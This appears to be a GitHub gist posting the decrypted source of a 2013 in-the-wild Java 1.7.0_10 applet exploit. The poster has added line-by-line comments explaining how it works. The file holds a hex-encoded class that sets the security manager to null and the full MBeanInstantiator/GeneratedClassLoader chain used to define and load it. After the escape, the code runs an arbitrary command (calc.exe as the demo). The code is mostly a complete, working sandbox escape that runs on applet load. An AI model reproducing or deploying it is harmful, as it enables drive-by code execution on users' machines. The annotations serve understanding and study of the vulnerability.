Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
/*
Java 0day 1.7.0_10 decrypted source
Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
From Russia with love.
*/
import java.applet.Applet;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;
public byte[] hex2Byte(String paramString) {
byte[] arrayOfByte = new byte[paramString.length() / 2];
for (int i = 0; i < arrayOfByte.length; i++) {
arrayOfByte[i] = (byte)Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
}
return arrayOfByte;
}
// Decompiles to:
/*
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class B implements PrivilegedExceptionAction {
public B() {
try {
AccessController.doPrivileged(this);
}
catch(Exception e) { }
}
public Object run() {
System.setSecurityManager(null);
return new Object();
}
}
// This basically removes the security manager (System.setSecurityManager(null)), allowing arbitrary code execution.
*/
// Decompilation credit to benmmurphy
// http://www.reddit.com/r/netsec/comments/16b4n1/0day_exploit_fo_java_17u10_spotted_in_the_wild/c7ulpd7
public static String ByteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017";
public void init() {
try {
// Convert above hex string to byte array.
byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);
// MBean creator to load the sun. classes
JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
// Looks like this loads some normally inaccessable libraries.
// Can't find any good documentation on these two, so I'm not sure what they do.
ClassLoader a = null;
Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
// "Returns a lookup object which is trusted minimally.
// It can only be used to create method handles to publicly accessible fields and methods."
MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
// Convienience for MethodType.methodType(MethodHandle.class, new Class[] { Class.class, MethodType.class });
// Returns the type of a method which takes a Class and a MethodType as input and returns a MethodHandle as output.
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
// "A typed, directly executable reference to an underlying method"
// Named "findConstructor", Is under the MethodHandles.Lookup class, and has the method type localMethodType1 (as above)
// Basically a(n in)direct pointer to the findConstructor function in the MethodHandles.Lookup class
MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
// Returns the type of a method which takes no input (void input) and returns no output
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
// Equivalent to localLookup.findConstructor(localClass1, localMethodType2)
// Basically a(n in)direct pointer to the constructor to the "sun.org.mozilla.javascript.internal.Context" class which has no input
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
// Returns a new object of the type "sun.org.mozilla.javascript.internal.Context" new Object[0] represents no input
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
// Method type which takes a Class, a String, and a MethodType, and returns a MethodHandle
MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
// Basically a(n in)direct pointer to the findVirtual function in the MethodHandles.Lookup class
MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
// Returns the methodType of something in the "sun.org.mozilla.javascript.internal.GeneratedClassLoader" class which returns a ClassLoader
MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
// Equivalent to localLookup.findVirtual(localClass1, "createClassLoader", localMethodType4)
// Basically a(n in)direct pointer to the function "createClassLoader" in "sun.org.mozilla.javascript.internal.Context"
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
// Equivalent to localObject1.createClassLoader(null)
Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
// Equivalent to localLookup.findVirtual(localClass2, "defineClass", localMethodType5)
// Basically a(n in)direct pointer to the function "defineClass" in "sun.org.mozilla.javascript.internal.GeneratedClassLoader"
MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2, "defineClass", localMethodType5 });
// Equivalent to localObject2.defineClass(null, arrayOfByte);
Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });
// Creates a newInstance of localClass3.
// localClass3 represents the decompiled code of arrayOfByte, which executes a class which removes the secuity manager
localClass3.newInstance();
// Now you can execute arbitrary code
Runtime.getRuntime().exec("calc.exe");
}
catch (Throwable ex) { }
}
// My overall understanding:
// 0. Load sun.org.mozilla.javascript.internal.Context and .GeneratedClassLoader through JmxMBeanServers
// 1. Create a new instance of sun.org.mozilla.javascript.internal.Context(). Call it x
// 2. Run y = x.createClassLoader(null), which is of the type sun.org.mozilla.javascript.internal.GeneratedClassLoader
// 3. Run z = y.defineClass(null, arrayOfBytes)
// 4. Run z.newInstance(), turning the security manager off.
// 5. Profit
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.